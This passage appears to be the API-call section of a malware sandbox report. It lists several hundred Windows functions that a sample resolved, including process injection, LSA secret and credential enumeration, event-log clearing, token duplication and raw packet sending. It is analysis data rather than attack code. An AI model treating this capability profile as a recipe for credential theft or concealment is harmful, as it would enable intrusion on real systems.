- "kernel32.dll.lstrcpyA",
- "kernel32.dll.FindNextFileA",
- "kernel32.dll.GlobalReAlloc",
- "kernel32.dll.HeapFree",
- "kernel32.dll.HeapReAlloc",
- "kernel32.dll.GetProcessHeap",
- "kernel32.dll.HeapAlloc",
- "kernel32.dll.GetUserDefaultLCID",
- "kernel32.dll.GetFullPathNameA",
- "kernel32.dll.FreeLibrary",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.GetLastError",
- "kernel32.dll.GetVersionExA",
- "kernel32.dll.WritePrivateProfileStringA",
- "kernel32.dll.CreateThread",
- "kernel32.dll.CreateEventA",
- "kernel32.dll.Sleep",
- "kernel32.dll.GlobalAlloc",
- "kernel32.dll.GlobalLock",
- "kernel32.dll.GlobalUnlock",
- "kernel32.dll.GetTempPathA",
- "kernel32.dll.FindFirstFileA",
- "kernel32.dll.FindClose",
- "kernel32.dll.SetFileAttributesA",
- "kernel32.dll.GetFileAttributesA",
- "kernel32.dll.MoveFileA",
- "kernel32.dll.IsBadReadPtr",
- "advapi32.dll.RegQueryValueA",
- "advapi32.dll.RegSetValueExA",
- "advapi32.dll.RegOpenKeyExA",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegCreateKeyExA",
- "comctl32.dll.ImageList_Destroy",
- "comctl32.dll.#17",
- "comdlg32.dll.ChooseColorA",
- "comdlg32.dll.GetOpenFileNameA",
- "comdlg32.dll.GetFileTitleA",
- "comdlg32.dll.GetSaveFileNameA",
- "gdi32.dll.Escape",
- "gdi32.dll.ExtTextOutA",
- "gdi32.dll.TextOutA",
- "gdi32.dll.RectVisible",
- "gdi32.dll.PtVisible",
- "gdi32.dll.GetViewportExtEx",
- "gdi32.dll.ExtSelectClipRgn",
- "gdi32.dll.LineTo",
- "gdi32.dll.MoveToEx",
- "gdi32.dll.ExcludeClipRect",
- "gdi32.dll.GetClipBox",
- "gdi32.dll.ScaleWindowExtEx",
- "gdi32.dll.SetWindowExtEx",
- "gdi32.dll.GetTextMetricsA",
- "gdi32.dll.SetStretchBltMode",
- "gdi32.dll.GetClipRgn",
- "gdi32.dll.CreatePolygonRgn",
- "gdi32.dll.SelectClipRgn",
- "gdi32.dll.DeleteObject",
- "gdi32.dll.CreateDIBitmap",
- "gdi32.dll.GetSystemPaletteEntries",
- "gdi32.dll.CreatePalette",
- "gdi32.dll.StretchBlt",
- "gdi32.dll.SelectPalette",
- "gdi32.dll.RealizePalette",
- "gdi32.dll.GetDIBits",
- "gdi32.dll.GetWindowExtEx",
- "gdi32.dll.GetViewportOrgEx",
- "gdi32.dll.GetWindowOrgEx",
- "gdi32.dll.BeginPath",
- "gdi32.dll.EndPath",
- "gdi32.dll.PathToRegion",
- "gdi32.dll.CreateEllipticRgn",
- "gdi32.dll.CreateRoundRectRgn",
- "gdi32.dll.GetTextColor",
- "gdi32.dll.GetBkMode",
- "gdi32.dll.GetBkColor",
- "gdi32.dll.GetROP2",
- "gdi32.dll.GetStretchBltMode",
- "gdi32.dll.GetPolyFillMode",
- "gdi32.dll.CreateCompatibleBitmap",
- "gdi32.dll.CreateDCA",
- "gdi32.dll.CreateBitmap",
- "gdi32.dll.SelectObject",
- "gdi32.dll.CreatePen",
- "gdi32.dll.PatBlt",
- "gdi32.dll.CombineRgn",
- "gdi32.dll.CreateRectRgn",
- "gdi32.dll.FillRgn",
- "gdi32.dll.CreateSolidBrush",
- "gdi32.dll.CreateFontIndirectA",
- "gdi32.dll.GetStockObject",
- "gdi32.dll.GetObjectA",
- "gdi32.dll.EndPage",
- "gdi32.dll.EndDoc",
- "gdi32.dll.DeleteDC",
- "gdi32.dll.StartDocA",
- "gdi32.dll.StartPage",
- "gdi32.dll.BitBlt",
- "gdi32.dll.CreateCompatibleDC",
- "gdi32.dll.Ellipse",
- "gdi32.dll.Rectangle",
- "gdi32.dll.LPtoDP",
- "gdi32.dll.DPtoLP",
- "gdi32.dll.GetCurrentObject",
- "gdi32.dll.RoundRect",
- "gdi32.dll.GetTextExtentPoint32A",
- "gdi32.dll.GetDeviceCaps",
- "gdi32.dll.CreateRectRgnIndirect",
- "gdi32.dll.SetBkColor",
- "gdi32.dll.SaveDC",
- "gdi32.dll.RestoreDC",
- "gdi32.dll.SetBkMode",
- "gdi32.dll.SetPolyFillMode",
- "gdi32.dll.SetROP2",
- "gdi32.dll.SetTextColor",
- "gdi32.dll.SetMapMode",
- "gdi32.dll.SetViewportOrgEx",
- "gdi32.dll.OffsetViewportOrgEx",
- "gdi32.dll.SetViewportExtEx",
- "gdi32.dll.ScaleViewportExtEx",
- "gdi32.dll.SetWindowOrgEx",
- "iphlpapi.dll.GetAdaptersInfo",
- "ole32.dll.CLSIDFromProgID",
- "ole32.dll.OleRun",
- "ole32.dll.CoCreateInstance",
- "ole32.dll.CLSIDFromString",
- "ole32.dll.OleUninitialize",
- "ole32.dll.OleInitialize",
- "oleaut32.dll.#23",
- "oleaut32.dll.#25",
- "oleaut32.dll.#11",
- "oleaut32.dll.#8",
- "oleaut32.dll.#2",
- "oleaut32.dll.#16",
- "oleaut32.dll.#15",
- "oleaut32.dll.#26",
- "oleaut32.dll.#163",
- "oleaut32.dll.#165",
- "oleaut32.dll.#24",
- "oleaut32.dll.#17",
- "oleaut32.dll.#20",
- "oleaut32.dll.#19",
- "oleaut32.dll.#12",
- "oleaut32.dll.#9",
- "oleaut32.dll.#161",
- "oleaut32.dll.#186",
- "oleaut32.dll.#10",
- "rasapi32.dll.RasHangUpA",
- "rasapi32.dll.RasGetConnectStatusA",
- "shell32.dll.SHGetSpecialFolderPathA",
- "shell32.dll.Shell_NotifyIconA",
- "shell32.dll.ShellExecuteA",
- "user32.dll.WaitForInputIdle",
- "user32.dll.GetClipboardData",
- "user32.dll.OpenClipboard",
- "user32.dll.wsprintfA",
- "user32.dll.CloseClipboard",
- "user32.dll.EqualRect",
- "user32.dll.SetClipboardData",
- "user32.dll.EmptyClipboard",
- "user32.dll.GetSystemMetrics",
- "user32.dll.GetCursorPos",
- "user32.dll.MessageBoxA",
- "user32.dll.GetSysColorBrush",
- "user32.dll.GetWindowTextA",
- "user32.dll.GetDlgItem",
- "user32.dll.FindWindowA",
- "user32.dll.GetWindowThreadProcessId",
- "user32.dll.GetClassNameA",
- "user32.dll.GetDesktopWindow",
- "user32.dll.GetForegroundWindow",
- "user32.dll.SetWindowTextA",
- "user32.dll.LoadIconA",
- "user32.dll.TranslateMessage",
- "user32.dll.DrawFrameControl",
- "user32.dll.DrawEdge",
- "user32.dll.DrawFocusRect",
- "user32.dll.WindowFromPoint",
- "user32.dll.GetMessageA",
- "user32.dll.DispatchMessageA",
- "user32.dll.SetRectEmpty",
- "user32.dll.RegisterClipboardFormatA",
- "user32.dll.CreateIconFromResourceEx",
- "user32.dll.CreateIconFromResource",
- "user32.dll.DrawIconEx",
- "user32.dll.CreatePopupMenu",
- "user32.dll.AppendMenuA",
- "user32.dll.ModifyMenuA",
- "user32.dll.CreateMenu",
- "user32.dll.CreateAcceleratorTableA",
- "user32.dll.GetDlgCtrlID",
- "user32.dll.LoadStringA",
- "user32.dll.GetMenuCheckMarkDimensions",
- "user32.dll.GetMenuState",
- "user32.dll.SetMenuItemBitmaps",
- "user32.dll.CheckMenuItem",
- "user32.dll.MoveWindow",
- "user32.dll.IsDialogMessageA",
- "user32.dll.ScrollWindowEx",
- "user32.dll.SendDlgItemMessageA",
- "user32.dll.MapWindowPoints",
- "user32.dll.AdjustWindowRectEx",
- "user32.dll.GetScrollPos",
- "user32.dll.RegisterClassA",
- "user32.dll.GetMenuItemCount",
- "user32.dll.GetMenuItemID",
- "user32.dll.CreateWindowExA",
- "user32.dll.SetWindowsHookExA",
- "user32.dll.CallNextHookEx",
- "user32.dll.GetClassLongA",
- "user32.dll.SetPropA",
- "user32.dll.UnhookWindowsHookEx",
- "user32.dll.GetPropA",
- "user32.dll.CallWindowProcA",
- "user32.dll.GetSubMenu",
- "user32.dll.EnableMenuItem",
- "user32.dll.ClientToScreen",
- "user32.dll.EnumDisplaySettingsA",
- "user32.dll.LoadImageA",
- "user32.dll.SystemParametersInfoA",
- "user32.dll.ShowWindow",
- "user32.dll.IsWindowEnabled",
- "user32.dll.TranslateAcceleratorA",
- "user32.dll.GetKeyState",
- "user32.dll.CopyAcceleratorTableA",
- "user32.dll.PostQuitMessage",
- "user32.dll.IsZoomed",
- "user32.dll.GetClassInfoA",
- "user32.dll.DefWindowProcA",
- "user32.dll.GetMenu",
- "user32.dll.SetMenu",
- "user32.dll.PeekMessageA",
- "user32.dll.IsIconic",
- "user32.dll.SetFocus",
- "user32.dll.GetActiveWindow",
- "user32.dll.GetWindow",
- "user32.dll.DestroyAcceleratorTable",
- "user32.dll.SetWindowRgn",
- "user32.dll.GetMessagePos",
- "user32.dll.ScreenToClient",
- "user32.dll.ChildWindowFromPointEx",
- "user32.dll.CopyRect",
- "user32.dll.LoadBitmapA",
- "user32.dll.WinHelpA",
- "user32.dll.KillTimer",
- "user32.dll.SetTimer",
- "user32.dll.ReleaseCapture",
- "user32.dll.GetCapture",
- "user32.dll.SetCapture",
- "user32.dll.GetScrollRange",
- "user32.dll.SetScrollRange",
- "user32.dll.SetScrollPos",
- "user32.dll.SetRect",
- "user32.dll.InflateRect",
- "user32.dll.IntersectRect",
- "user32.dll.DestroyIcon",
- "user32.dll.PtInRect",
- "user32.dll.OffsetRect",
- "user32.dll.IsWindowVisible",
- "user32.dll.EnableWindow",
- "user32.dll.RedrawWindow",
- "user32.dll.GetWindowLongA",
- "user32.dll.SetWindowLongA",
- "user32.dll.GetSysColor",
- "user32.dll.SetActiveWindow",
- "user32.dll.SetCursorPos",
- "user32.dll.LoadCursorA",
- "user32.dll.SetCursor",
- "user32.dll.GetDC",
- "user32.dll.FillRect",
- "user32.dll.IsRectEmpty",
- "user32.dll.ReleaseDC",
- "user32.dll.IsChild",
- "user32.dll.DestroyMenu",
- "user32.dll.SetForegroundWindow",
- "user32.dll.GetWindowRect",
- "user32.dll.UnregisterClassA",
- "user32.dll.UpdateWindow",
- "user32.dll.ValidateRect",
- "user32.dll.InvalidateRect",
- "user32.dll.GetClientRect",
- "user32.dll.GetFocus",
- "user32.dll.GetParent",
- "user32.dll.GetTopWindow",
- "user32.dll.PostMessageA",
- "user32.dll.IsWindow",
- "user32.dll.SetParent",
- "user32.dll.DestroyCursor",
- "user32.dll.SendMessageA",
- "user32.dll.SetWindowPos",
- "user32.dll.GetWindowTextLengthA",
- "user32.dll.CharUpperA",
- "user32.dll.GetWindowDC",
- "user32.dll.BeginPaint",
- "user32.dll.EndPaint",
- "user32.dll.TabbedTextOutA",
- "user32.dll.DrawTextA",
- "user32.dll.GrayStringA",
- "user32.dll.DestroyWindow",
- "user32.dll.CreateDialogIndirectParamA",
- "user32.dll.EndDialog",
- "user32.dll.GetNextDlgTabItem",
- "user32.dll.GetWindowPlacement",
- "user32.dll.RegisterWindowMessageA",
- "user32.dll.GetLastActivePopup",
- "user32.dll.GetMessageTime",
- "user32.dll.RemovePropA",
- "version.dll.GetFileVersionInfoA",
- "version.dll.VerQueryValueA",
- "version.dll.VerLanguageNameA",
- "version.dll.GetFileVersionInfoSizeA",
- "wininet.dll.InternetCanonicalizeUrlA",
- "wininet.dll.InternetCrackUrlA",
- "wininet.dll.HttpOpenRequestA",
- "wininet.dll.HttpSendRequestA",
- "wininet.dll.HttpQueryInfoA",
- "wininet.dll.InternetReadFile",
- "wininet.dll.InternetConnectA",
- "wininet.dll.InternetSetOptionA",
- "wininet.dll.InternetCloseHandle",
- "wininet.dll.InternetOpenA",
- "winmm.dll.midiStreamRestart",
- "winmm.dll.midiStreamClose",
- "winmm.dll.midiOutReset",
- "winmm.dll.midiStreamStop",
- "winmm.dll.waveOutUnprepareHeader",
- "winmm.dll.waveOutPrepareHeader",
- "winmm.dll.waveOutWrite",
- "winmm.dll.waveOutPause",
- "winmm.dll.waveOutReset",
- "winmm.dll.waveOutClose",
- "winmm.dll.midiStreamOut",
- "winmm.dll.midiOutPrepareHeader",
- "winmm.dll.midiStreamProperty",
- "winmm.dll.midiStreamOpen",
- "winmm.dll.midiOutUnprepareHeader",
- "winmm.dll.waveOutOpen",
- "winmm.dll.waveOutGetNumDevs",
- "winspool.drv.OpenPrinterA",
- "winspool.drv.DocumentPropertiesA",
- "winspool.drv.ClosePrinter",
- "ws2_32.dll.#18",
- "ws2_32.dll.#116",
- "ws2_32.dll.#115",
- "ws2_32.dll.#52",
- "ws2_32.dll.#12",
- "ws2_32.dll.#11",
- "ws2_32.dll.#57",
- "ws2_32.dll.#19",
- "ws2_32.dll.#3",
- "ws2_32.dll.#101",
- "ws2_32.dll.#9",
- "ws2_32.dll.#2",
- "ws2_32.dll.#6",
- "ws2_32.dll.#15",
- "ws2_32.dll.#151",
- "ws2_32.dll.#1",
- "ws2_32.dll.#5",
- "ws2_32.dll.#13",
- "ws2_32.dll.#16",
- "ws2_32.dll.#8",
- "ws2_32.dll.#23",
- "ws2_32.dll.#4",
- "ws2_32.dll.#10",
- "ws2_32.dll.#20",
- "ws2_32.dll.#17",
- "kernel32.dll.IsProcessorFeaturePresent",
- "cryptbase.dll.SystemFunction036",
- "dwmapi.dll.DwmIsCompositionEnabled",
- "kernel32.dll.GetNativeSystemInfo",
- "kernel32.dll.Wow64DisableWow64FsRedirection",
- "advapi32.dll.RegDisableReflectionKey",
- "advapi32.dll.RegQueryValueExA",
- "advapi32.dll.RegEnableReflectionKey",
- "kernel32.dll.Wow64RevertWow64FsRedirection",
- "advapi32.dll.CryptAcquireContextA",
- "cryptsp.dll.CryptAcquireContextA",
- "advapi32.dll.CryptCreateHash",
- "cryptsp.dll.CryptCreateHash",
- "advapi32.dll.CryptHashData",
- "cryptsp.dll.CryptHashData",
- "advapi32.dll.CryptGetHashParam",
- "cryptsp.dll.CryptGetHashParam",
- "advapi32.dll.CryptDestroyHash",
- "cryptsp.dll.CryptDestroyHash",
- "advapi32.dll.CryptReleaseContext",
- "cryptsp.dll.CryptReleaseContext",
- "kernel32.dll.GetComputerNameA",
- "advapi32.dll.OpenSCManagerA",
- "advapi32.dll.OpenServiceA",
- "advapi32.dll.CloseServiceHandle",
- "ntdll.dll.RtlAdjustPrivilege",
- "kernel32.dll.InterlockedCompareExchange",
- "oleaut32.dll.#500",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.SetConsoleInputExeNameW",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
- "mswsock.dll.WSPStartup",
- "wshtcpip.dll.WSHOpenSocket",
- "wshtcpip.dll.WSHOpenSocket2",
- "wshtcpip.dll.WSHJoinLeaf",
- "wshtcpip.dll.WSHNotify",
- "wshtcpip.dll.WSHGetSocketInformation",
- "wshtcpip.dll.WSHSetSocketInformation",
- "wshtcpip.dll.WSHGetSockaddrType",
- "wshtcpip.dll.WSHGetWildcardSockaddr",
- "wshtcpip.dll.WSHGetBroadcastSockaddr",
- "wshtcpip.dll.WSHAddressToString",
- "wshtcpip.dll.WSHStringToAddress",
- "wshtcpip.dll.WSHIoctl",
- "advapi32.dll.StartServiceCtrlDispatcherA",
- "advapi32.dll.CreateServiceA",
- "kernel32.dll.lstrcpyn",
- "advapi32.dll.ChangeServiceConfig2A",
- "advapi32.dll.StartServiceA",
- "advapi32.dll.QueryServiceStatus",
- "advapi32.dll.RegisterServiceCtrlHandlerA",
- "advapi32.dll.SetServiceStatus",
- "rasapi32.dll.RasConnectionNotificationW",
- "sechost.dll.NotifyServiceStatusChangeA",
- "ole32.dll.CoInitializeEx",
- "advapi32.dll.RegDeleteTreeA",
- "advapi32.dll.RegDeleteTreeW",
- "ole32.dll.CoTaskMemAlloc",
- "oleaut32.dll.DllGetClassObject",
- "oleaut32.dll.DllCanUnloadNow",
- "advapi32.dll.RegOpenKeyW",
- "ole32.dll.CoTaskMemFree",
- "ole32.dll.StringFromIID",
- "iphlpapi.dll.GetAdaptersAddresses",
- "dhcpcsvc.dll.DhcpRequestParams",
- "oleaut32.dll.#6",
- "advapi32.dll.ChangeServiceConfigA",
- "ole32.dll.CoUninitialize",
- "kernel32.dll.GetSystemWow64DirectoryA",
- "ntdll.dll.ZwResumeProcess",
- "shlwapi.dll.PathRemoveBlanksA",
- "psapi.dll.GetProcessImageFileNameA",
- "kernel32.dll.GetLogicalDriveStringsA",
- "kernel32.dll.QueryDosDeviceA",
- "kernel32.dll.GetSystemInfo",
- "ntdll.dll.NtWow64QueryInformationProcess64",
- "ntdll.dll.NtWow64ReadVirtualMemory64",
- "psapi.dll.EmptyWorkingSet",
- "iphlpapi.dll.GetExtendedTcpTable",
- "kernel32.dll.InitializeProcThreadAttributeList",
- "kernel32.dll.RtlMoveMemory",
- "kernel32.dll.UpdateProcThreadAttribute",
- "advapi32.dll.CreateProcessAsUserA",
- "kernel32.dll.DeleteProcThreadAttributeList",
- "winhttp.dll.WinHttpOpen",
- "winhttp.dll.WinHttpSetTimeouts",
- "winhttp.dll.WinHttpSetOption",
- "winhttp.dll.WinHttpCrackUrl",
- "shlwapi.dll.StrCmpNW",
- "winhttp.dll.WinHttpConnect",
- "winhttp.dll.WinHttpOpenRequest",
- "winhttp.dll.WinHttpGetDefaultProxyConfiguration",
- "winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser",
- "kernel32.dll.SetPriorityClass",
- "nsi.dll.NsiAllocateAndGetTable",
- "cfgmgr32.dll.CM_Open_Class_Key_ExW",
- "iphlpapi.dll.ConvertInterfaceGuidToLuid",
- "iphlpapi.dll.GetIfEntry2",
- "iphlpapi.dll.GetIpForwardTable2",
- "iphlpapi.dll.GetIpNetEntry2",
- "iphlpapi.dll.FreeMibTable",
- "nsi.dll.NsiFreeTable",
- "winhttp.dll.WinHttpGetProxyForUrl",
- "winhttp.dll.WinHttpSendRequest",
- "ws2_32.dll.GetAddrInfoW",
- "ws2_32.dll.WSASocketW",
- "ws2_32.dll.#21",
- "ws2_32.dll.WSAIoctl",
- "ws2_32.dll.FreeAddrInfoW",
- "ws2_32.dll.WSARecv",
- "ws2_32.dll.WSASend",
- "winhttp.dll.WinHttpReceiveResponse",
- "winhttp.dll.WinHttpQueryHeaders",
- "shlwapi.dll.StrStrIW",
- "winhttp.dll.WinHttpQueryDataAvailable",
- "winhttp.dll.WinHttpReadData",
- "sechost.dll.LookupAccountNameLocalW",
- "rasmontr.dll.InitHelperDll",
- "nshwfp.dll.InitHelperDll",
- "dhcpcmonitor.dll.InitHelperDll",
- "wshelper.dll.InitHelperDll",
- "nshhttp.dll.InitHelperDll",
- "fwcfg.dll.InitHelperDll",
- "authfwcfg.dll.InitHelperDll",
- "ifmon.dll.InitHelperDll",
- "netiohlp.dll.InitHelperDll",
- "whhelper.dll.InitHelperDll",
- "hnetmon.dll.InitHelperDll",
- "rpcnsh.dll.InitHelperDll",
- "dot3cfg.dll.InitHelperDll",
- "napmontr.dll.InitHelperDll",
- "nshipsec.dll.InitHelperDll",
- "p2pnetsh.dll.InitHelperDll",
- "wlancfg.dll.InitHelperDll",
- "peerdistsh.dll.InitHelperDll",
- "cryptsp.dll.CryptEnumProvidersW",
- "user32.dll.LoadStringW",
- "advapi32.dll.RegCreateKeyExW",
- "advapi32.dll.RegOpenKeyExW",
- "sechost.dll.OpenSCManagerW",
- "sechost.dll.OpenServiceW",
- "sechost.dll.QueryServiceConfigW",
- "sechost.dll.CloseServiceHandle",
- "sechost.dll.QueryServiceStatus",
- "advapi32.dll.RegQueryInfoKeyW",
- "advapi32.dll.RegEnumKeyExW",
- "advapi32.dll.LookupAccountSidW",
- "sechost.dll.LookupAccountSidLocalW",
- "cryptsp.dll.CryptAcquireContextW",
- "cryptsp.dll.CryptGenRandom",
- "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
- "httpapi.dll.HttpInitialize",
- "userenv.dll.RegisterGPNotification",
- "userenv.dll.UnregisterGPNotification",
- "gpapi.dll.RegisterGPNotificationInternal",
- "bcryptprimitives.dll.GetHashInterface",
- "bcryptprimitives.dll.GetCipherInterface",
- "httpapi.dll.HttpTerminate",
- "gpapi.dll.UnregisterGPNotificationInternal",
- "comctl32.dll.#388",
- "ipsecsvc.dll.SpdServiceMain",
- "rpcrt4.dll.NdrClientCall3",
- "rpcrt4.dll.RpcBindingCreateW",
- "rpcrt4.dll.RpcBindingBind",
- "rpcrt4.dll.I_RpcMapWin32Status",
- "rpcrt4.dll.RpcBindingFree",
- "shfolder.dll.SHGetFolderPathA",
- "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
- "setupapi.dll.CM_Get_Device_Interface_List_ExW",
- "comctl32.dll.#332",
- "comctl32.dll.#386",
- "kernel32.dll.GetUserDefaultUILanguage",
- "shell32.dll.#680",
- "system.dll.Call",
- "kernel32.dll.IsWow64Process",
- "nsexec.dll.Exec",
- "kernel32.dll.Wow64EnableWow64FsRedirection",
- "advapi32.dll.DeleteService",
- "ole32.dll.CoRevokeInitializeSpy",
- "ole32.dll.NdrOleInitializeExtension",
- "ole32.dll.CoGetClassObject",
- "ole32.dll.CoGetMarshalSizeMax",
- "ole32.dll.CoMarshalInterface",
- "ole32.dll.CoUnmarshalInterface",
- "ole32.dll.CoGetPSClsid",
- "ole32.dll.CoReleaseMarshalData",
- "ole32.dll.DcomChannelSetHResult",
- "advapi32.dll.UnregisterTraceGuids",
- "comctl32.dll.#321",
- "rpcrt4.dll.I_RpcSNCHOption",
- "sechost.dll.ControlService",
- "sechost.dll.StartServiceW",
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.FlsFree",
- "dbghelp.dll.SymFromAddr",
- "dbghelp.dll.SymInitialize",
- "wpcap.dll.pcap_close",
- "wpcap.dll.pcap_datalink",
- "wpcap.dll.pcap_dispatch",
- "wpcap.dll.pcap_findalldevs",
- "wpcap.dll.pcap_freealldevs",
- "wpcap.dll.pcap_lib_version",
- "wpcap.dll.pcap_lookupdev",
- "wpcap.dll.pcap_major_version",
- "wpcap.dll.pcap_minor_version",
- "wpcap.dll.pcap_open_live",
- "wpcap.dll.pcap_open_offline",
- "wpcap.dll.pcap_sendpacket",
- "wpcap.dll.pcap_next",
- "wpcap.dll.pcap_setdirection",
- "wpcap.dll.pcap_datalink_val_to_name",
- "wpcap.dll.pcap_perror",
- "wpcap.dll.pcap_sendqueue_alloc",
- "wpcap.dll.pcap_sendqueue_transmit",
- "wpcap.dll.pcap_sendqueue_destroy",
- "wpcap.dll.pcap_sendqueue_queue",
- "kernel32.dll.GetFullPathNameW",
- "kernel32.dll.GetTimeFormatW",
- "kernel32.dll.GetSystemTimeAsFileTime",
- "kernel32.dll.SystemTimeToFileTime",
- "kernel32.dll.GetDateFormatW",
- "kernel32.dll.RtlVirtualUnwind",
- "kernel32.dll.GetProcessId",
- "kernel32.dll.PurgeComm",
- "kernel32.dll.ClearCommError",
- "kernel32.dll.CreateRemoteThread",
- "kernel32.dll.CreateProcessW",
- "kernel32.dll.SetConsoleOutputCP",
- "kernel32.dll.GetConsoleOutputCP",
- "kernel32.dll.CreateFileMappingW",
- "kernel32.dll.UnmapViewOfFile",
- "kernel32.dll.MapViewOfFile",
- "kernel32.dll.WriteProcessMemory",
- "kernel32.dll.VirtualAllocEx",
- "kernel32.dll.VirtualProtectEx",
- "kernel32.dll.ReadProcessMemory",
- "kernel32.dll.VirtualFreeEx",
- "kernel32.dll.VirtualQueryEx",
- "kernel32.dll.VirtualQuery",
- "kernel32.dll.GetComputerNameExW",
- "kernel32.dll.DeviceIoControl",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "kernel32.dll.FindNextFileW",
- "kernel32.dll.GetCurrentDirectoryW",
- "kernel32.dll.GetFileSizeEx",
- "kernel32.dll.GetFileAttributesW",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.GetFileInformationByHandle",
- "kernel32.dll.GetCurrentDirectoryA",
- "kernel32.dll.GetTempFileNameA",
- "kernel32.dll.FileTimeToDosDateTime",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.VirtualProtect",
- "kernel32.dll.CreateMutexW",
- "kernel32.dll.HeapCompact",
- "kernel32.dll.TryEnterCriticalSection",
- "kernel32.dll.QueryPerformanceCounter",
- "kernel32.dll.FlushViewOfFile",
- "kernel32.dll.WaitForSingleObjectEx",
- "kernel32.dll.OutputDebugStringW",
- "kernel32.dll.UnlockFileEx",
- "kernel32.dll.FormatMessageA",
- "kernel32.dll.FormatMessageW",
- "kernel32.dll.GetVersionExW",
- "kernel32.dll.HeapValidate",
- "kernel32.dll.GetTempPathW",
- "kernel32.dll.LockFileEx",
- "kernel32.dll.GetDiskFreeSpaceW",
- "kernel32.dll.CreateFileMappingA",
- "kernel32.dll.GetDiskFreeSpaceA",
- "kernel32.dll.GetFileAttributesExW",
- "kernel32.dll.OutputDebugStringA",
- "kernel32.dll.DeleteFileW",
- "kernel32.dll.GetCurrentProcessId",
- "kernel32.dll.AreFileApisANSI",
- "kernel32.dll.SetConsoleCtrlHandler",
- "kernel32.dll.SetConsoleTitleW",
- "kernel32.dll.LoadLibraryW",
- "kernel32.dll.GetModuleHandleW",
- "kernel32.dll.SetHandleInformation",
- "kernel32.dll.CreatePipe",
- "kernel32.dll.CreateEventW",
- "kernel32.dll.RtlLookupFunctionEntry",
- "kernel32.dll.RtlCaptureContext",
- "kernel32.dll.GetSystemDirectoryW",
- "kernel32.dll.SetConsoleCursorPosition",
- "kernel32.dll.FillConsoleOutputCharacterW",
- "kernel32.dll.GetComputerNameW",
- "kernel32.dll.ProcessIdToSessionId",
- "kernel32.dll.SetCurrentDirectoryW",
- "kernel32.dll.GetConsoleScreenBufferInfo",
- "advapi32.dll.CryptSetHashParam",
- "advapi32.dll.CryptExportKey",
- "advapi32.dll.CryptAcquireContextW",
- "advapi32.dll.CryptSetKeyParam",
- "advapi32.dll.CryptGetKeyParam",
- "advapi32.dll.CryptDuplicateKey",
- "advapi32.dll.CryptGetProvParam",
- "advapi32.dll.CryptImportKey",
- "advapi32.dll.SystemFunction007",
- "advapi32.dll.CryptEncrypt",
- "advapi32.dll.CryptGenKey",
- "advapi32.dll.CryptDestroyKey",
- "advapi32.dll.CryptDecrypt",
- "advapi32.dll.CopySid",
- "advapi32.dll.GetLengthSid",
- "advapi32.dll.LsaQueryInformationPolicy",
- "advapi32.dll.LsaOpenPolicy",
- "advapi32.dll.LsaClose",
- "advapi32.dll.CreateWellKnownSid",
- "advapi32.dll.CreateProcessWithLogonW",
- "advapi32.dll.CreateProcessAsUserW",
- "advapi32.dll.RegQueryValueExW",
- "advapi32.dll.RegEnumValueW",
- "advapi32.dll.RegSetValueExW",
- "advapi32.dll.SystemFunction032",
- "advapi32.dll.ConvertSidToStringSidW",
- "advapi32.dll.CreateServiceW",
- "advapi32.dll.OpenSCManagerW",
- "advapi32.dll.SetServiceObjectSecurity",
- "advapi32.dll.OpenServiceW",
- "advapi32.dll.BuildSecurityDescriptorW",
- "advapi32.dll.QueryServiceObjectSecurity",
- "advapi32.dll.StartServiceW",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.QueryServiceStatusEx",
- "advapi32.dll.FreeSid",
- "advapi32.dll.ControlService",
- "advapi32.dll.IsTextUnicode",
- "advapi32.dll.OpenProcessToken",
- "advapi32.dll.GetTokenInformation",
- "advapi32.dll.LookupAccountNameW",
- "advapi32.dll.DuplicateTokenEx",
- "advapi32.dll.CheckTokenMembership",
- "advapi32.dll.CryptEnumProvidersW",
- "advapi32.dll.ConvertStringSidToSidW",
- "advapi32.dll.LsaFreeMemory",
- "advapi32.dll.SetThreadToken",
- "advapi32.dll.CryptSetProvParam",
- "advapi32.dll.CryptEnumProviderTypesW",
- "advapi32.dll.SystemFunction006",
- "advapi32.dll.CryptGetUserKey",
- "advapi32.dll.OpenEventLogW",
- "advapi32.dll.GetNumberOfEventLogRecords",
- "advapi32.dll.ClearEventLogW",
- "advapi32.dll.SystemFunction001",
- "advapi32.dll.CryptDeriveKey",
- "advapi32.dll.SystemFunction005",
- "advapi32.dll.LsaQueryTrustedDomainInfoByName",
- "advapi32.dll.CryptSignHashW",
- "advapi32.dll.LsaOpenSecret",
- "advapi32.dll.LsaQuerySecret",
- "advapi32.dll.SystemFunction013",
- "advapi32.dll.LsaRetrievePrivateData",
- "advapi32.dll.LsaEnumerateTrustedDomainsEx",
- "advapi32.dll.LookupPrivilegeValueW",
- "advapi32.dll.StartServiceCtrlDispatcherW",
- "advapi32.dll.RegisterServiceCtrlHandlerW",
- "advapi32.dll.IsValidSid",
- "advapi32.dll.LookupPrivilegeNameW",
- "advapi32.dll.OpenThreadToken",
- "advapi32.dll.CredFree",
- "advapi32.dll.CredEnumerateW",
- "advapi32.dll.GetSidSubAuthority",
- "advapi32.dll.GetSidSubAuthorityCount",
- "advapi32.dll.SystemFunction025",
- "advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
- "advapi32.dll.SystemFunction024",
- "advapi32.dll.A_SHAFinal",
- "advapi32.dll.A_SHAInit",
- "advapi32.dll.A_SHAUpdate",
- "cabinet.dll.#11",
- "cabinet.dll.#14",
- "cabinet.dll.#10",
- "cabinet.dll.#13",
- "crypt32.dll.CertGetNameStringW",
- "crypt32.dll.CryptEncodeObject",
- "crypt32.dll.CertEnumSystemStore",
- "crypt32.dll.CryptSignAndEncodeCertificate",
- "crypt32.dll.CertEnumCertificatesInStore",
- "crypt32.dll.CertAddEncodedCertificateToStore",
- "crypt32.dll.CertOpenStore",
- "crypt32.dll.CertFreeCertificateContext",
- "crypt32.dll.CertCloseStore",
